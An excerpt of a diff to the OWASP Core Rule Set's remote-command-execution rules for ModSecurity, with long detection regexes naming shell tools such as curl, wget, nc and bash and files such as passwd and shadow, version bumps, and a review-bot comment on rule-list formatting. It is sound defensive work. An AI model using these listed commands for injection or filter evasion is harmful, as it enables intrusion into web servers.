\x0b&\),<>\|]|$)|plit|vtool)|u(?:psfilter|rl(?:[\s\x0b&\),<>\|]|$)))|d(?:(?:ash|i(?:alog|ff)|vips)(?:[\s\x0b&\),<>\|]|$)|hclient|m(?:esg(?:[\s\x0b&\),<>\|]|$)|idecode|setup)|o(?:(?:as|ne)(?:[\s\x0b&\),<>\|]|$)|cker(?:[\s\x0b&\),\-<>\|]|$)|sbox)|pkg(?:[\s\x0b&\),\-<>\|]|$))|e(?:2fsck|asy_install|(?:cho|fax|grep|macs|sac|val)(?:[\s\x0b&\),<>\|]|$)|n(?:d(?:if|sw)(?:[\s\x0b&\),<>\|]|$)|v-update)|x(?:(?:ec|p(?:and|(?:ec|or)t|r))(?:[\s\x0b&\),<>\|]|$)|iftool))|f(?:acter|d(?:(?:find|isk)(?:[\s\x0b&\),<>\|]|$)|u?mount)|(?:etch|grep|lock|unction)(?:[\s\x0b&\),<>\|]|$)|i(?:le(?:[\s\x0b&\),<>\|]|$|test)|(?:n(?:d|ger)|sh)(?:[\s\x0b&\),<>\|]|$))|o(?:ld(?:[\s\x0b&\),<>\|]|$)|reach)|ping(?:[\s\x0b&\),6<>\|]|$)|tp(?:stats|who))|g(?:(?:awk|core|i(?:mp|nsh)|z(?:cat|exe|ip))(?:[\s\x0b&\),<>\|]|$)|e(?:ni(?:e(?:[\s\x0b&\),<>\|]|$)|soimage)|t(?:cap|facl(?:[\s\x0b&\),<>\|]|$)))|hc(?:-(?:[\s\x0b&\),<>\|]|$)|i(?:[\s\x0b&\),\-<>\|]|$))|r(?:(?:cat|ep)(?:[\s\x0b&\),<>\|]|$)|oupmod)|tester|unzip)|h(?:(?:ash|i(?:ghlight|story))(?:[\s\x0b&\),<>\|]|$)|e(?:ad(?:[\s\x0b&\),<>\|]|$)|xdump)|ost(?:id|name)|ping3|t(?:digest|op(?:[\s\x0b&\),<>\|]|$)|passwd))|i(?:(?:conv|nstall)(?:[\s\x0b&\),<>\|]|$)|f(?:config|top(?:[\s\x0b&\),<>\|]|$))|onice|p(?:6?tables|config|p(?:eveprinter|find|tool))|spell)|j(?:(?:ava|exec)(?:[\s\x0b&\),<>\|]|$)|o(?:in(?:[\s\x0b&\),<>\|]|$)|urnalctl)|runscript)|k(?:ill(?
:[\s\x0b&\),<>\|]|$|all)|nife(?:[\s\x0b&\),<>\|]|$)|sshell)|l(?:a(?:st(?:comm(?:[\s\x0b&\),<>\|]|$)|log(?:in)?)|tex(?:[\s\x0b&\),<>\|]|$))|dconfig|ess(?:echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|$|get)|o(?:(?:cate|ok)(?:[\s\x0b&\),<>\|]|$)|g(?:inctl|(?:nam|sav)e)|setup)|s(?:(?:-F|cpu|hw|mod|of|pci|usb)(?:[\s\x0b&\),<>\|]|$)|b_release)|trace|ua(?:la)?tex|wp-(?:d(?:ownload|ump)|mirror|request)|ynx(?:[\s\x0b&\),<>\|]|$)|z(?:4c(?:[\s\x0b&\),<>\|]|$|at)|c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|$|dec|info)|ore)))|m(?:a(?:il(?:[\s\x0b&\),<>\|]|$|[qx](?:[\s\x0b&\),<>\|]|$))|(?:ke|wk)(?:[\s\x0b&\),<>\|]|$)|ster\.passwd)|k(?:(?:dir|nod)(?:[\s\x0b&\),<>\|]|$)|fifo|temp)|locate|o(?:squitto|unt(?:[\s\x0b&\),<>\|]|$))|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|utt(?:[\s\x0b&\),<>\|]|$)|ysql(?:[\s\x0b&\),<>\|]|$|admin|dump(?:slow)?|hotcopy|show))|n(?:(?:a(?:no|sm|wk)|ice|map|o(?:de|hup)|ping|roff|ull)(?:[\s\x0b&\),<>\|]|$)|c(?:\.(?:openbsd|traditional)|at(?:[\s\x0b&\),<>\|]|$))|e(?:ofetch|t(?:(?:c|st)at|kit-ftp|plan))|s(?:enter|lookup|tat(?:[\s\x0b&\),<>\|]|$)))|o(?:ctave(?:[\s\x0b&\),<>\|]|$)|nintr|p(?:en(?:ssl|v(?:pn|t))|kg(?:[\s\x0b&\),<>\|]|$)))|p(?:a(?:(?:cman|rted|tch)(?:[\s\x0b&\),<>\|]|$)|s(?:swd|te(?:[\s\x0b&\),<>\|]|$)))|d(?:b(?:2mb|3(?:[\s\x0b&\),\.<>\|]|$))|f(?:la)?tex|ksh(?:[\s\x0b&\),<>\|]|$))|er(?:(?:f|ms)(?:[\s\x0b&\),<>\|]|$)|l(?:5?(?:[\s\x0b&\),<>\|]|$)|sh))|(?:(?:ft|gre)p|opd|u(?:ppet|shd))(?:[\s\x0b&\),<>\|]|$)|hp(?:-cgi|[57](?:[\s\x0b&\),<>\|]|$))|i(?:(?:co|gz|ng6?)(?:[\s\x0b&\),<>\|]|$)|dstat)|k(?:exec|g_?info|ill(?:[\s\x0b&\),<>\|]|$))|rint(?:env|f(?:[\s\x0b&\),<>\|]|$))|s(?:(?:ed|ql)(?:[\s\x0b&\),<>\|]|$)|ftp)|tar(?:[\s\x0b&\),<>\|]|$|diff|grep)|wd\.db|y(?:3?versions|thon(?:[23]|[^\s\x0b]{1,10}\b)))|r(?:(?:ak[eu]|bash|nano|oute|vi(?:ew|m))(?:[\s\x0b&\),<>\|]|$)|e(?:a(?:delf|lpath)|(?:(?:boo|dcarpe)t|name|p(?:eat|lace))(?:[\s\x0b&\),<>\|]|$)|stic)|l(?:ogin|wrap)|m(?:dir(?:[\s\x0b&\),<>\|]|$)|t-(?:dump|tar)|user)|pm(?:db(?
:[\s\x0b&\),<>\|]|$)|(?:quer|verif)y)|sync(?:-ssl|[\s\x0b&\),<>\|]|$)|u(?:by[^\s\x0b]{1,10}\b|n(?:-(?:mailcap|parts)|c(?:[\s\x0b&\),<>\|]|$))))|s(?:(?:ash|c(?:hed|r(?:een|ipt))|diff|(?:ft|na)p|l(?:eep|sh))(?:[\s\x0b&\),<>\|]|$)|e(?:(?:ndmail|rvice)(?:[\s\x0b&\),<>\|]|$)|t(?:arch|cap|env|facl(?:[\s\x0b&\),<>\|]|$)|sid))|h(?:\.distrib|(?:adow|ells|u(?:f|tdown))(?:[\s\x0b&\),<>\|]|$))|mbclient|o(?:(?:ca|r)t(?:[\s\x0b&\),<>\|]|$)|elim)|p(?:lit(?:[\s\x0b&\),<>\|]|$)|wd\.db)|qlite3|sh(?:-(?:a(?:dd|gent)|copy-id|key(?:ge|sca)n)|pass)|t(?:art-stop-daemon|d(?:buf|err|in(?:[\s\x0b&\),<>\|]|$)|out)|r(?:ace|ings(?:[\s\x0b&\),<>\|]|$)))|udo(?:-rs|[\s\x0b&\),<>_\|]|$|edit|replay)|vn(?:a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:il(?:[\s\x0b&\),<>\|]|$|f(?:[\s\x0b&\),<>\|]|$))|sk(?:[\s\x0b&\),<>\|]|$|set))|c(?:l?sh(?:[\s\x0b&\),<>\|]|$)|p(?:dump|ing|traceroute))|elnet|(?:ftp|mux|ouch)(?:[\s\x0b&\),<>\|]|$)|ime(?:datectl|out(?:[\s\x0b&\),<>\|]|$))|r(?:aceroute6?|off(?:[\s\x0b&\),<>\|]|$))|shark)|u(?:limit(?:[\s\x0b&\),<>\|]|$)|n(?:(?:ame|compress|iq|rar|s(?:et|hare)|xz)(?:[\s\x0b&\),<>\|]|$)|expand|l(?:ink(?:[\s\x0b&\),<>\|]|$)|z(?:4(?:[\s\x0b&\),<>\|]|$)|ma))|pigz|z(?:ip(?:[\s\x0b&\),<>\|]|$)|std))|p(?:2date(?:[\s\x0b&\),<>\|]|$)|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:algrind|i(?:(?:[ep]w|gr|rsh)(?:[\s\x0b&\),<>\|]|$)|mdiff|sudo(?:-rs)?)|olatility(?:[\s\x0b&\),<>\|]|$))|w(?:(?:all|get)(?:[\s\x0b&\),<>\|]|$)|h(?:iptail(?:[\s\x0b&\),<>\|]|$)|o(?:ami|is(?:[\s\x0b&\),<>\|]|$)))|i(?:reshark|sh(?:[\s\x0b&\),<>\|]|$)))|x(?:(?:args|pad|term)(?:[\s\x0b&\),<>\|]|$)|e(?:latex|tex(?:[\s\x0b&\),<>\|]|$))|mo(?:dmap|re(?:[\s\x0b&\),<>\|]|$))|z(?:c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|d(?:ec(?:[\s\x0b&\),<>\|]|$)|iff)|[ef]?grep|less|more))|z(?:athura|(?:c(?:at|mp)|diff|grep|less|run)(?:[\s\x0b&\),<>\|]|$)|e(?:grep|ro(?:[\s\x0b&\),<>\|]|$))|fgrep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|mo(
?:dload|re(?:[\s\x0b&\),<>\|]|$))|s(?:oelim|td(?:[\s\x0b&\),<>\|]|$|(?:ca|m)t|grep|less))|ypper))" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\
"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:HEAD|POST|y(?:arn|elp))[\s\x0b&\),<>\|]|a(?:dd(?:group|user)|getty|(?:l(?:ias|pine)|tobm|xel)[\s\x0b&\),<>\|]|nsible|p(?:parmor_[^\s\x0b]{1,10}\b|t(?:-get|itude[\s\x0b&\),<>\|]))|r(?:ch[\s\x0b&\),<>\|]|ia2c|j(?:-register|disp))|s(?:cii(?:-xfr|85)|pell)|u(?:ditctl|repot|search))|b(?:a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\),<>\|]|c))|h[\s\x0b&\),<>\|])|tch[\s\x0b&\),<>\|])|lkid[\s\x0b&\),<>\|]|pftrace|r(?:eaksw|(?:idge|wap)[\s\x0b&\),<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\),<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu[\s\x0b&\),<>\|])|z(?:c(?:at|mp)[\s\x0b&\),<>\|]|diff|e(?:grep|xe[\s\x0b&\),<>\|])|f?grep|ip2(?:[\s\x0b&\),<>\|]|recover)|less|more))|c(?:[89]9-gcc|a(?:ncel|psh)[\s\x0b&\),<>\|]|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)[\s\x0b&\),<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f
[\s\x0b&\),\-<>\|])|(?:flag|pas)s|g(?:passwd|rp[\s\x0b&\),<>\|]))|lang(?:\+\+|[\s\x0b&\),<>\|])|o(?:bc(?:[\s\x0b&\),<>\|]|run)|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\),<>\|]|proc|w(?:say|think))|p(?:(?:an|io)[\s\x0b&\),<>\|]|ulimit)|r(?:ash[\s\x0b&\),<>\|]|on(?:[\s\x0b&\),<>\|]|tab))|s(?:cli[\s\x0b&\),<>\|]|plit|vtool)|u(?:psfilter|rl[\s\x0b&\),<>\|]))|d(?:(?:ash|i(?:alog|ff)|vips)[\s\x0b&\),<>\|]|hclient|m(?:esg[\s\x0b&\),<>\|]|idecode|setup)|o(?:(?:as|ne)[\s\x0b&\),<>\|]|cker[\s\x0b&\),\-<>\|]|sbox)|pkg[\s\x0b&\),\-<>\|])|e(?:2fsck|asy_install|(?:cho|fax|grep|macs|sac|val)[\s\x0b&\),<>\|]|n(?:d(?:if|sw)[\s\x0b&\),<>\|]|v-update)|x(?:(?:ec|p(?:and|(?:ec|or)t|r))[\s\x0b&\),<>\|]|iftool))|f(?:acter|d(?:(?:find|isk)[\s\x0b&\),<>\|]|u?mount)|(?:etch|grep|lock|unction)[\s\x0b&\),<>\|]|i(?:le(?:[\s\x0b&\),<>\|]|test)|(?:n(?:d|ger)|sh)[\s\x0b&\),<>\|])|o(?:ld[\s\x0b&\),<>\|]|reach)|ping[\s\x0b&\),6<>\|]|tp(?:stats|who))|g(?:(?:awk|core|i(?:mp|nsh)|z(?:cat|exe|ip))[\s\x0b&\),<>\|]|e(?:ni(?:e[\s\x0b&\),<>\|]|soimage)|t(?:cap|facl[\s\x0b&\),<>\|]))|hc(?:-[\s\x0b&\),<>\|]|i[\s\x0b&\),\-<>\|])|r(?:(?:cat|ep)[\s\x0b&\),<>\|]|oupmod)|tester|unzip)|h(?:(?:ash|i(?:ghlight|story))[\s\x0b&\),<>\|]|e(?:ad[\s\x0b&\),<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op[\s\x0b&\),<>\|]|passwd))|i(?:(?:conv|nstall)[\s\x0b&\),<>\|]|f(?:config|top[\s\x0b&\),<>\|])|onice|p(?:6?tables|config|p(?:eveprinter|find|tool))|spell)|j(?:(?:ava|exec)[\s\x0b&\),<>\|]|o(?:in[\s\x0b&\),<>\|]|urnalctl)|runscript)|k(?:ill(?:[\s\x0b&\),<>\|]|all)|nife[\s\x0b&\),<>\|]|sshell)|l(?:a(?:st(?:comm[\s\x0b&\),<>\|]|log(?:in)?)|tex[\s\x0b&\),<>\|])|dconfig|ess(?:echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|get)|o(?:(?:cate|ok)[\s\x0b&\),<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|s(?:(?:-F|cpu|hw|mod|of|pci|usb)[\s\x0b&\),<>\|]|b_release)|trace|ua(?:la)?tex|wp-(?:d(?:ownload|ump)|mirror|request)|ynx[\s\x0b&\),<>\|]|z(?:4c(?:[\s\x0b&\),<>\|]|at)|c(?:at|mp)[\s\x0b&\),<>\|]|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|dec|i
nfo)|ore)))|m(?:(?:a(?:il[qx]?|ke|wk)|utt)[\s\x0b&\),<>\|]|k(?:(?:dir|nod)[\s\x0b&\),<>\|]|fifo|temp)|locate|o(?:squitto|unt[\s\x0b&\),<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:[\s\x0b&\),<>\|]|admin|dump(?:slow)?|hotcopy|show))|n(?:(?:a(?:no|sm|wk)|ice|map|o(?:de|hup)|ping|roff)[\s\x0b&\),<>\|]|c(?:\.(?:openbsd|traditional)|at[\s\x0b&\),<>\|])|e(?:ofetch|t(?:(?:c|st)at|kit-ftp|plan))|s(?:enter|lookup|tat[\s\x0b&\),<>\|]))|o(?:ctave[\s\x0b&\),<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg[\s\x0b&\),<>\|]))|p(?:a(?:(?:cman|rted|tch)[\s\x0b&\),<>\|]|s(?:swd|te[\s\x0b&\),<>\|]))|d(?:b(?:2mb|3[\s\x0b&\),\.<>\|])|f(?:la)?tex|ksh[\s\x0b&\),<>\|])|er(?:(?:f|ms)[\s\x0b&\),<>\|]|l(?:5?[\s\x0b&\),<>\|]|sh))|(?:(?:ft|gre)p|opd|u(?:ppet|shd))[\s\x0b&\),<>\|]|hp(?:-cgi|[57][\s\x0b&\),<>\|])|i(?:(?:co|gz|ng6?)[\s\x0b&\),<>\|]|dstat)|k(?:exec|g_?info|ill[\s\x0b&\),<>\|])|rint(?:env|f[\s\x0b&\),<>\|])|s(?:(?:ed|ql)[\s\x0b&\),<>\|]|ftp)|tar(?:[\s\x0b&\),<>\|]|diff|grep)|y(?:3?versions|thon(?:[23]|[^\s\x0b]{1,10}\b)))|r(?:(?:ak[eu]|bash|nano|oute|vi(?:ew|m))[\s\x0b&\),<>\|]|e(?:a(?:delf|lpath)|(?:(?:boo|dcarpe)t|name|p(?:eat|lace))[\s\x0b&\),<>\|]|stic)|l(?:ogin|wrap)|m(?:dir[\s\x0b&\),<>\|]|t-(?:dump|tar)|user)|pm(?:db[\s\x0b&\),<>\|]|(?:quer|verif)y)|sync(?:-ssl|[\s\x0b&\),<>\|])|u(?:by[^\s\x0b]{1,10}\b|n(?:-(?:mailcap|parts)|c[\s\x0b&\),<>\|])))|s(?:(?:ash|c(?:hed|r(?:een|ipt))|diff|(?:ft|na)p|l(?:eep|sh)|plit)[\s\x0b&\),<>\|]|e(?:(?:ndmail|rvice)[\s\x0b&\),<>\|]|t(?:arch|cap|env|facl[\s\x0b&\),<>\|]|sid))|h(?:\.distrib|u(?:f|tdown)[\s\x0b&\),<>\|])|mbclient|o(?:(?:ca|r)t[\s\x0b&\),<>\|]|elim)|qlite3|sh(?:-(?:a(?:dd|gent)|copy-id|key(?:ge|sca)n)|pass)|t(?:art-stop-daemon|dbuf|r(?:ace|ings[\s\x0b&\),<>\|]))|udo(?:-rs|[\s\x0b&\),<>_\|]|edit|replay)|vn(?:a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:ilf?[\s\x0b&\),<>\|]|sk(?:[\s\x0b&\),<>\|]|set))|c(?:l?sh[\s\x0b&\),<>\|]|p(?:dump|ing|traceroute))|elnet|(?:f
tp|mux|ouch)[\s\x0b&\),<>\|]|ime(?:datectl|out[\s\x0b&\),<>\|])|r(?:a(?:ceroute6?|p[\s\x0b&\),<>\|])|off[\s\x0b&\),<>\|])|shark)|u(?:limit[\s\x0b&\),<>\|]|n(?:(?:ame|compress|iq|rar|s(?:et|hare)|xz)[\s\x0b&\),<>\|]|expand|l(?:ink[\s\x0b&\),<>\|]|z(?:4[\s\x0b&\),<>\|]|ma))|pigz|z(?:ip[\s\x0b&\),<>\|]|std))|p(?:2date[\s\x0b&\),<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:algrind|i(?:(?:[ep]w|gr|rsh)[\s\x0b&\),<>\|]|mdiff|sudo(?:-rs)?)|olatility[\s\x0b&\),<>\|])|w(?:(?:all|get)[\s\x0b&\),<>\|]|h(?:iptail[\s\x0b&\),<>\|]|o(?:ami|is[\s\x0b&\),<>\|]))|i(?:reshark|sh[\s\x0b&\),<>\|]))|x(?:(?:args|pad|term)[\s\x0b&\),<>\|]|e(?:latex|tex[\s\x0b&\),<>\|])|mo(?:dmap|re[\s\x0b&\),<>\|])|z(?:c(?:at|mp)[\s\x0b&\),<>\|]|d(?:ec[\s\x0b&\),<>\|]|iff)|[ef]?grep|less|more))|z(?:athura|(?:c(?:at|mp)|diff|grep|less|run)[\s\x0b&\),<>\|]|[ef]grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|mo(?:dload|re[\s\x0b&\),<>\|])|s(?:oelim|td(?:[\s\x0b&\),<>\|]|(?:ca|m)t|grep|less))|ypper))" \ "id:932235,\ phase:2,\ block,\ @@ -195,7 +199,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -228,7 +232,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFil tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" 
@@ -262,7 +266,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -306,7 +310,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \$(?:\
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -353,7 +357,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \b(?:f
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -393,7 +397,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ~[\+\-
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -427,7 +431,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \{[0-9
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -467,6 +471,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \{[0-9
 #
 # .932250 (base rule, PL1, targets two and three character commands)
 # .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+# .932340 (PL-1, matches commands with no arguments)
+# .932350 (PL-3, matches commands with no arguments)
 #
 # .932240 (generic detection, PL2, targets generic evasion attempts)
 # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
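Review bot: The two added lines write the paranoia level as `PL-1`/`PL-3` while the neighbouring entries in the same list use `PL1`/`PL2`; for a consistent list they should read `# .932340 (PL1, matches commands with no arguments)` and `# .932350 (PL3, matches commands with no arguments)`. The list appears to be grouped by paranoia level (PL1 entries, a bare `#`, then PL2 entries), so a PL3 rule placed inside the PL1 group is likely to mislead a reader looking for what fires at PL1; the remainder of the list is outside this hunk, so its later groups cannot be checked here. The same two lines are added again in the hunk at `@@ -526,6 +532,8 @@` and need the same change.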
